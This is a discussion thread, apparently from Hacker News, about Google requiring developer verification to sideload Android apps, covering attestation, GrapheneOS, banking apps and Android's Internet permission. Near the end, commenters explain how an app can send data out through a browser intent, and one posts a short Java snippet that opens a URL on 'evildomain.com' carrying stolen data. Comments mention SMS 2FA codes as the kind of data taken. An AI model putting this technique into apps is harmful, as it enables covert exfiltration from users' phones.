Google to require developer verification to install and sideload Android apps

I don't know that it's that simple. Further down that section (1920) in reference [1] reads

"(3) A dedicated encrypted criminal communication device does not include-- (a) a device if-- (i) the device has been designed, modified or equipped with software or security features, and (ii) a reasonable person would consider the software or security features have been applied for a primary purpose other than facilitating communication between persons involved in criminal activity to defeat law enforcement detection,"

It's not automatic: depending on what a reasonable person thinks and the definition of criminal activity.

At the pace of regulations we have, one day everything will be forbidden and we will all be criminals just for protecting our own wealth or security from these... yes, from these mafias.

This is uncanny and worryingly specific, and I'm not a lawyer, but if you're not already under suspicion of being a criminal, then installing graphene doesn't match this definition I think

Microsoft mismanaged it but there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.

They did a bunch of terrible inept rollouts with confusing technology for both users and developers and effectively shot themselves in the foot. But it did not have to go down that way.

> Microsoft has way too much of legacy software people use, banning it all overnight will not go well at all.

A lot of legacy software was killed off with the move to 64-bit Windows. Consumers survived that and for businesses registering their software with MS isn't a problem. They're already handing Microsoft all of their company email, their documents, their spreadsheets, etc. and paying Microsoft for the privilege. MS doesn't care at all about consumers.

They can just require hash of legacy binaries sent to Microsoft and rubberstamped back. Eventually they'll have a near comprehensive list of legacy binaries in common use, and move to block unknown binaries in circulation as "malware".

When was the last time you opened your start menu?

Granny can get scammed using Anydesk, available on Google Play.

I suspect it's not grandma getting scammed by APKs, but people installing cracked versions of spotify/youtube/paid games.

My mother in law is constantly worried by some Google Ads in random apps that her phone is hacked...

Developers sometimes seem to be as in control as farmers are of the distribution of their produce. There's no absolute rule that gives the owners of large scale distribution networks power over both producer and consumer. It's just laws of convenience. It's easier for everyone to go through a few or just a single common broker.

There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?

Money is a powerful motivator. For better or worse.

Not related to the OP, but no you don't.

Just look up how to skip the "OOTB (out of the box) experience" and you can still bypass having to set up a cloud account on Windows 11 and can just set up a local account like normal. :)

Got tired of this with a few extensions I made too. It felt like every year or so they'd completely break some API and I'd have to go switch to the new one, then they wanted a privacy policy, then justification for permissions, etc etc. Wasn't worth the trouble eventually and I just let them die.

If you don't mind sharing, which country is that?

Yeah, I'll just ditch Google over this. The only reason I put up with their crap is because I can actually just install software on my phone. If they take that away, there's no motivation to stay.

> the antitrust prosecution will double.

In Brazil? In Malaysia? In Singapore? I highly doubt it.

Maybe they gave a political donation?

They're also the best equipped to tell if you've done so, and restrict access from critical functionality needed by many in their day-to-day lives if you've done so.

The intentions behind all the security hardware they introduced in pixel phones first, and is now required by play integrity to function might've been well-meaning, but that doesn't really matter in the end. Security features that the user can't control and bypass aren't security features - they're digital handcuffs.

true, and recently they deserved a lot of credit for publicly releasing their device trees and drivers. unfortunately, with the 10 series pixels they no longer will be releasing device trees, which makes it much more difficult to maintain custom ROMs

They greatly improved the situation over the past couple years. Azure Trusted Signing is only $10/month and provides cloud-based signing.

It's a huge pain to set up initially, but it's smooth sailing after that. There's a good tutorial at https://melatonin.dev/blog/code-signing-on-windows-with-azur...

And none of that (sadly) is about openness. It's about price. The iOS share of mobile spending is basically the inverse: ~70% iOS, ~30% Android.

The fact that people die with helmets on motorcycles should put an end to the argument that it's for our own good.

Open -> Click away the error message -> Settings -> Privacy & Security -> Open Anyways -> Open Anyways -> Authenticate -> app actually opens

It requires a trip to a submenu in the Settings app now. You can’t do it simply or easily.

Doesn't GNU/Linux also have this problem with e.g. Netflix? If you don't pass their spyware, you get shitty streams from video apps and no access to financial accounts.

>and Google are pushing hard to get as many apps as possible to activate that for "security"

I'd be interested in further reading on Google's outreach to big banks and major finance CO's ( or others) pushing for device attestation if you have any further reading.

And Google stopped providing device trees and driver binaries... and stopped releasing AOSP as often, and, and...

Right. The OP's point was that just having 2 major OSes is the problem but it's clearly not because we had that situation with desktops/laptops and they both allow arbitrary code.

> These both contain ways to run arbitrary compiled code from an arbitrary source

And they're both working towards taking that away.

For now we have Linux as a 3rd option, but that only exists so long as there's hardware available that'll let you run it. Can easily imagine a near-future where you can only get 'Windows hardware' or 'Apple hardware' and nothing modern that'll boot a 3rd-party OS.

They will just get sacked for sycophants either here or abroad. For every principled worker there is, there is another person willing to eschew those principles for that paycheck. This is a desperate world by design to enable these tradeoffs by the very people who build, maintain, deploy, and ultimately control the worlds systems.

You mean the people actively building this system? I have to assume it's decently far along for them to make this announcement.

For years I've been buying middle-of-the-road Android phones because they provide pretty good bang for the buck, but if I can't use a computer I paid for however the fuck I want, I'm just going to start getting the cheapest crap I can get away with and use it as little as possible. "Vote with your wallet" doesn't have to mean total abstinence.

>live like an outcast that can't access essential services?

I don't own a smartphone and I am happy as ever. I used to own one a while back, but it wasn't worth the effort and the rage when it was slow.

If a service can be accessed only with a smartphone, I complain (which is of little use).

It really isn't that bad. I've never owned a smartphone, and can do everything I need through websites and the occasional phone call.

Flip phones can access essential services just fine, if some business or government office is only allowing something to be done via smartphone app, that’s a problem.

> live like an outcast

in all things. I would encourage you and everyone who reads this post to stare down this option with realistic consideration. In a society this broken, it is the solution to more and more things. To checkout, to accept the hard mode because to pick the path of convenience is to be exploited.

Again, and again, and again.

What if people stopped buying brand new Android phones and instead bought used ones and then installed alternative Android versions and app stores.

Buy Apple; the point is to hurt Google. If enough people do it, Google might reconsider. Show them that the open ecosystem is the only value Android added, and if they refuse to bring back the open ecosystem then their platform will slowly die. Won't be long until Google's as locked-down as Apple at this rate, so all Android gives you is a power-hungry OS that protect your privacy even less than iOS does.

I'm curious if GrapheneOS or other custom Android builds would be able to avoid these restrictions reasonably.

Obviously this is going to impact the supply of apps, since the market share of custom Android is smaller than even the market share of people willing to sideload or use an alternative store on a mainstream Android phone. Many developers might quit the game.

I had a Jolla phone on my hands the other day and I must admit this…

SailfishOS is pretty nice

I might get one next

GrapheneOS is a beautiful stop-gap, but there are real bona-fide Linux smartphones out there. To be clear, there are not many, the hardware often isn't great, the software often isn't great. PinePhone and Librem come to mind.

The alternative is just Apple; if Google loses enough users they might reconsider. Essentially the only real advantage Android had over Apple was being a more free platform/ecosystem; if they're going to do away with that, then they should be shown that this means they'll lose a lot of users.

All of my bank apps work fine on graphene. I'd switch banks if their app stopped working, not stop using graphene. I stopped using Google wallet, I don't miss it enough to justify using stock android. For other apps, I just put them in a separate profile that has good play installed/configured. It really wasn't bad. The worst part is wiping your phone to install graphene the first time, I prefer just to get a new device for it so I can move stuff over

My banking app works fine on GrapheneOS. There is a crowd-sourced list here with current status for many of them: https://privsec.dev/posts/android/banking-applications-compa...

I love how so many of the responses in this thread are "it works for my particular bank" or "my bank's website is good enough" or "I'd only need it to deposit checks, but I never need to do that"... as if those are actually helpful responses to this general problem.

Many many people have banking apps that will not work on non-Google-blessed devices, use banks that have mobile websites that are terrible, and need to do mobile check deposits (which is usually only available in the app, and not the mobile website, if the bank even has one). And no, we're not going to "change our bank".

The reality is that there are so many things that break, sometimes in subtle ways, when you try to use an alternative Android OS. Some people may not have any problems, and that's great! But many -- I would dare to say most -- will.

And there's also a ton of uncertainty: I don't really want to wipe my phone, install GrapheneOS, spend hours messing with it and setting it up, only to find that something critical doesn't work, and now I have to flash back to the stock OS, and hope I can restore everything the way it was.

A web browser in the worst case scenario. The same way you'd do it on a computer.

Most banking app work, either directly or with a settings change to allow Google Play Service emulation. [1]

[1] https://grapheneos.org/usage#banking-apps

Second phone for all official business apps, banking, etc. Never leaves home and it's used only for this purpose

What's wrong with their web apps? The only real shortcoming I can think of is depositing checks digitally but I haven't had to do that in years.

As a GrapheneOS user, the way I access my banking app is by downloading it from the Google Play store just like everyone else.

Is that a jab at grapheneOS ? Because thats just another thing that google is borking up. And a little bit more so the banks themselves.

GrapheneOS is the way that all phone operating systems SHOULD be made. Layers and segregation between your banking apps and all the privacy breaking trash and malware you can get off the app store.

It is the banks and google making weird rootkit shit to try and lock down things that is the problem here.

> Fairphone never updating their phones

I have a Fairphone and i get updates pretty frequently so not sure what you mean?

Fairphones are also LineageOS and postmarketOS compatible, both options are without tracking and without Google's mandated policies.

LineageOS without gapps is really usable if you set aside the "big" social media apps. WhatsApp can be sourced from their website as an APK. The social apps like facebook, instagram, snap, tiktok and others all require Google Play's tracking services (aka gapps).

For YouTube there's multiple better alternative open source apps available, and mastodon, amethyst and the fediverse apps on f-droid are far superior in terms of performance to the Google Store alternatives.

It's incredible that by the end of it, the WM rollercoaster made us actually miss WinCE. If you had have told us that initially none of us would have believed you. WM had so much potential and was just totally botched.

They are namespacing, like it or not, and clearly they don't care about open-source that much.

A recent real life example:

You can apply for an HSBC Global Money Account if you have: […] The HSBC UK Mobile Banking app (Global Money is only available via the app)

From https://www.hsbc.co.uk/current-accounts/products/global-mone...

What gp is saying is that to access banking form desktop will require an approved OS and attestation just like on mobile. The current state of affairs is that an approved OS and attestation are only required on mobile but not on desktop

I think they worded that poorly, but didn't mean what you got from it: the point I'd take isn't that they will require you to have a desktop, but that even desktop will also have the same restrictions, so it isn't just a mobile problem.

It's already that way in my country. The few banks that still have the web version only support it for their business clients, and it's only something like two or three banks. If you're a regular client, there's not a single bank left that you can still use without a smartphone (unless you're ready to visit a branch for every little thing — so pretty much daily).

> can only be installed in one device at the same time

I neither like nor understand this restriction. It makes device failure / loss / theft a much more difficult experience to recover from than it would otherwise be. The device should be throwaway. I specifically keep old phones in case something happens to the new one.

WhatsApp is probably the stupidest example of only being able to be on a single device (but I'm forced to use WhatsApp for one specific purpose, so I already resent it). Signal does the same thing, so maybe it's related to the E2EE that WhatsApp licensed from Signal...

I have a huge problem with companies using their own apps for 2FA.

Google started doing this for Gmail. To use Gmail on my laptop, I need to approve it with Gmail on my phone. I never signed up for this. I’m now afraid if I delete the Gmail app from my phone that I’ll lose access to my email.

I hate the direction “security” is taking us. It’s done in the name of security, but it feels more like blackmail to get and keep the company app on your phone.

Not true for either my AIB or Wise account.

Controllable by whom? I don't do any banking on my phone exactly because I don't trust my phone to keep anything I do on my phone private.

It'd launch the browser app. You can have your evil page redirect to a benign page so it just looks like Chrome randomly opened or whatever. It is not as powerful as full network access as you can only send so much information in query parameters, but if you are doing some phishing or stealing sms 2fa codes or whatever then it is plenty to send back whatever payload you wanted to.

And of course basically every app requires internet permissions for ordinary behavior. The world where an explicit internet permission would somehow get somebody to look askance at some malware that they were about to download is just not believable.

Google also used to show you which apps used Internet permission in Play Store. But they removed it, which makes it harder to notice which apps don't use it.

Google mostly doesn't let you deny permissions while running apps that require them; recently there's some permissions that you can pick at runtime. So it's not suprising that they don't let you deny this one, when they don't even show it in the store.

You can deny it on Graphene OS.

Even device owner (MDM) apps can't revoke that permission.

Force enabled, more like

> The main thing this permission would be used for would be blocking ads.

This permission has existed for longer than runtime permissions. You have never been able to revoke it, it was just something you agreed to when you installed the app or you didn't install the app.

It was "removed" in that era because if every app requests the same permission, then nobody cares about it anymore. When every app asks for the same thing, users stop paying attention to it. So no, it had fuck all to do with ads because that was never a thing in the first place. And ad blocking doesn't require this permission, either.

> Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?

You can still use it for this. Apps are required to declare the permission still, it's listed on the Play Store under the "permissions" section. Similarly the OS reports the same thing. Presumably F-droid or whatever else also has a list of permissions before you install, and it'll be listed there.

Although Google's own Calculator app requires Internet permission. Take that for what's it worth.

There's plenty of actually problematic stuff Google does (like this change in the article), there's no need to make up whack ass conspiracy theories, too.

> I've never managed to find even a single PoC bypassing it

Because it is obvious. Just open a web browser.

More details here: https://old.reddit.com/r/androiddev/comments/ci4tdq/were_on_...

> I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.

   Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE);
   Intent i = new Intent(Intent.ACTION_VIEW, uri);
   startActivity(i);

There could of course be side effects in the future when this restriction is rolled out, as in your device's Play Integrity status could be affected and your banking app/phone wallet might not let you perform app-based payments from that device.